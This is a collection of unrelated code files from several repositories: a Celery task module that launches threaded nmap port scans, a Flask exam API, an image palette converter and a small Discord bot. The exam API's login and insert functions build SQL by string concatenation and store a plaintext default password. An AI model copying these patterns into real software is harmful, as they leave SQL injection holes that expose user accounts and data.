target_ports = str(target_port).split(',')
for target_ip in target_ips:
for target_port in target_ports:
t = Thread(target = nmapScan,args = (str(source_hostname), str(target_ip), str(target_port)))
t.start()
@task()
def async_task(x, y):
"""
定义一个 celery 异步任务
"""
logger.error(u"celery 定时任务执行成功,执行结果:{:0>2}:{:0>2}".format(x, y))
return x + y
def execute_task():
"""
执行 celery 异步任务
调用celery任务方法:
task.delay(arg1, arg2, kwarg1='x', kwarg2='y')
task.apply_async(args=[arg1, arg2], kwargs={'kwarg1': 'x', 'kwarg2': 'y'})
delay(): 简便方法,类似调用普通函数
apply_async(): 设置celery的额外执行选项时必须使用该方法,如定时(eta)等
详见 :http://celery.readthedocs.org/en/latest/userguide/calling.html
"""
now = datetime.datetime.now()
logger.error(u"celery 定时任务启动,将在60s后执行,当前时间:{}".format(now))
# 调用定时任务
async_task.apply_async(args=[now.hour, now.minute], eta=now + datetime.timedelta(seconds=60))
@periodic_task(run_every=crontab(minute='*/5', hour='*', day_of_week="*"))
def get_time():
"""
celery 周期任务示例
run_every=crontab(minute='*/5', hour='*', day_of_week="*"):每 5 分钟执行一次任务
periodic_task:程序运行时自动触发周期任务
"""
execute_task()
now = datetime.datetime.now()
logger.error(u"celery 周期任务调用成功,当前时间:{}".format(now))
``` |
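A sketch of how the scan is typically triggered from application code: save the parameters first (the field names match how `async_portscan` reads them), then enqueue the task. The concrete values are illustrative:

```python
from home_application.models import PortScanPara
from home_application.celery_tasks import async_portscan

PortScanPara.objects.create(
    source_hostname='web-01',        # illustrative values
    target_ip='10.0.0.5,10.0.0.6',   # comma-separated, as the task expects
    target_port='22,80,443',
)
async_portscan.delay()  # the task reads the latest PortScanPara row and fans out nmap threads
```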
{
"source": "13A5T0N/rs_examen",
"score": 3
} |
#### File: rs_examen/api/examen.py
```python
import conn,numpy as np
import pandas as pd
from flask import jsonify,json
db = conn.cursor
def add_examen(db,titel,vak,klas):
sql = "INSERT INTO examen(examen_titel,vak,klas) value('" + titel + "','" + vak + "','" + klas + "')"
db.execute(sql)
conn.db.commit()
def import_vragen(path):
# df = pd.DataFrame(pd.read_csv (r'%s' %path), columns = ['Vraag','Antwoord1','Antwoord2','Antwoord3','Antwoord4','CorrecteAntwoord'])
df = pd.read_csv (r'%s' %path)
data = df.to_dict(orient='records')
for record in data:
# Antwoord1,Antwoord2,Antwoord3,Antwoord4,CorrecteAntwoord,Vraag = record
db.execute('''
INSERT INTO vragen (vraag, ant_1, ant_2,ant_3,ant_4)
VALUES (%s,%s,%s,%s,%s)
''',
(
record['Vraag'],
record['Antwoord1'],
record['Antwoord2'],
record['Antwoord3'],
record['Antwoord4']
)
)
print(record)
return 'True'
# print (df)
# sql= ""
# db.execute(sql)
# conn.db.commit()
def add_antw(db,file):
# import CSV
data = pd.read_csv(file)
df = pd.DataFrame(data, columns = ['Vraag','Antwoord1','Antwoord2','Antwoord3','Antwoord4','CorrecteAntwoord'])
# insert data
    for row in df.itertuples():
        db.execute('''
            INSERT INTO vragen (vraag, ant_1, ant_2, ant_3, ant_4, cor_ant)
            VALUES (%s, %s, %s, %s, %s, %s)
            ''',
            (
                row.Vraag,
                row.Antwoord1,
                row.Antwoord2,
                row.Antwoord3,
                row.Antwoord4,
                row.CorrecteAntwoord
            )
        )
conn.db.commit()
```
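`import_vragen` reads the CSV by column name, so the file has to carry the headers it accesses (`Vraag`, `Antwoord1`–`Antwoord4`; `CorrecteAntwoord` is present in the original files but not inserted by this function). A small illustrative call, assuming the `api` directory is on the path:

```python
# vragen.csv (illustrative content):
# Vraag,Antwoord1,Antwoord2,Antwoord3,Antwoord4,CorrecteAntwoord
# "2+2?",1,2,3,4,4
import conn
import examen

examen.import_vragen('vragen.csv')
conn.db.commit()  # import_vragen itself leaves the commit commented out
```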
#### File: rs_examen/api/user.py
```python
import conn
def login(db,user,pwd):
sql = "SELECT * from gebruikers where geb_email = '" + user + "'and geb_password ='" + pwd +"'"
db.execute(sql)
result = db.fetchall()
for row in result:
return row
def get_studenten(db):
vak = []
db.execute("SELECT * from gebruikers where geb_rol ='student'")
result = db.fetchall()
resp = result
return resp
def add_student(db,naam,voornaam,email):
sql = "INSERT INTO gebruikers(geb_password,geb_rol,geb_naam,geb_voornaam,geb_email) value('student','student','" + naam + "','" + voornaam + "','" + email + "')"
db.execute(sql)
conn.db.commit()
def latest_student(db):
vak = []
db.execute("SELECT * from gebruikers where geb_rol ='student' ORDER BY geb_id DESC LIMIT 1")
result = db.fetchall()
resp = result
return resp
``` |
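A sketch of how these helpers might be called from a Flask route; the route, the form field names, and the JSON shape are assumptions, while `conn.cursor` is the shared cursor used throughout the `api` package:

```python
from flask import Flask, request, jsonify
import conn
import user

app = Flask(__name__)

@app.route('/login', methods=['POST'])
def login_route():
    row = user.login(conn.cursor, request.form['email'], request.form['password'])
    if row is None:
        return jsonify({'ok': False}), 401
    return jsonify({'ok': True, 'user': row})
```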
{
"source": "13ace37/gruvbox-factory",
"score": 2
} |
#### File: 13ace37/gruvbox-factory/conv.py
```python
import signal
import argparse
import sys
import os
from pathlib import Path
from ImageGoNord import GoNord
from rich.console import Console
from rich.panel import Panel
def main():
signal.signal(signal.SIGINT, signal_handler)
console = Console()
gruvbox_factory = GoNord()
gruvbox_factory.reset_palette()
add_gruvbox_palette(gruvbox_factory)
# Checks if there's an argument
if len(sys.argv) > 1:
image_paths = fromCommandArgument(console)
else:
image_paths = fromTui(console)
for image_path in image_paths:
if os.path.isfile(image_path):
process_image(image_path, console, gruvbox_factory)
else:
console.print(
f"❌ [red]We had a problem in the pipeline! \nThe image at '{image_path}' could not be found! \nSkipping... [/]"
)
continue
# Gets the file path from the Argument
def fromCommandArgument(console):
command_parser = argparse.ArgumentParser(
description="A simple cli to manufacture nord themed wallpapers."
)
command_parser.add_argument(
"Path", metavar="path", nargs="+", type=str, help="The path(s) to the image(s)."
)
args = command_parser.parse_args()
return args.Path
# Gets the file path from user input
def fromTui(console):
console.print(
Panel(
"🏭 [bold green] Gruvbox Factory [/] 🏭", expand=False, border_style="yellow"
)
)
return [
os.path.expanduser(path)
for path in console.input(
"🖼️ [bold yellow]Which image(s) do you want to manufacture? (image paths separated by spaces):[/] "
).split()
]
def process_image(image_path, console, gruvbox_factory):
image = gruvbox_factory.open_image(image_path)
console.print(f"🔨 [yellow]manufacturing '{os.path.basename(image_path)}'...[/]")
# TODO: might be a better idea to save the new Image in the same directory the command is being run from
save_path = os.path.join(
os.path.dirname(image_path), "nord_" + os.path.basename(image_path)
)
gruvbox_factory.convert_image(image, save_path=(save_path))
console.print(f"✅ [bold green]Done![/] [green](saved at '{save_path}')[/]")
def add_gruvbox_palette(gruvbox_factory):
colorPalette = ["#2E3440","#3B4252","#434C5E","#4C566A","#D8DEE9","#E5E9F0","#ECEFF4","#8FBCBB","#88C0D0","#81A1C1","#5E81AC","#BF616A","#D08770","#EBCB8B","#A3BE8C","#B48EAD"]
for color in colorPalette:
gruvbox_factory.add_color_to_palette(color)
## handle CTRL + C
def signal_handler(signal, frame):
print()
sys.exit(0)
if __name__ == "__main__":
main()
``` |
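The same pipeline can also be driven programmatically, without the prompt or CLI arguments; the input path below is illustrative and the import assumes this file is reachable as `conv.py`:

```python
from rich.console import Console
from ImageGoNord import GoNord
from conv import add_gruvbox_palette, process_image  # reuse the helpers defined above

factory = GoNord()
factory.reset_palette()
add_gruvbox_palette(factory)
process_image('/home/me/Pictures/wall.png', Console(), factory)  # writes nord_wall.png next to it
```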
{
"source": "13ace37/python-discord",
"score": 2
} |
#### File: python-discord/commands/handler.py
```python
from importlib import import_module
def run(command, args):
    __command__ = import_module("commands." + command)
__command__.run(args)
```
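The handler imports `commands/<name>.py` and calls its `run(args)`, so a command module only needs to expose that one function. A minimal hypothetical command, `commands/ping.py`:

```python
# commands/ping.py (hypothetical example command)
def run(args):
    # args is the message content split on whitespace, with the command word removed
    print("pong", args)
```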
#### File: 13ace37/python-discord/index.py
```python
from os import getcwd as getDir
from os.path import isfile as existFile
from discord import Client
# Welcome to the hardcode area :)
token = "token" # todo: move this into a config or env variables
prefix = "!" # todo: move this into a config or env variables
# Welcome to the hardcode area :)
client = Client()
@client.event
async def on_ready():
    print(f'Successfully logged in as {client.user}!')
@client.event
async def on_message(message):
if message.author == client.user:
return
if not message.content.startswith(prefix):
return
args = message.content.split()
command = args[0][len(prefix):len(args[0])]
args.pop(0)
if (existFile(getDir()+"/commands/" + command + ".py")):
import commands.handler as CommandHandler
CommandHandler.run(command, args)
client.run(token)
``` |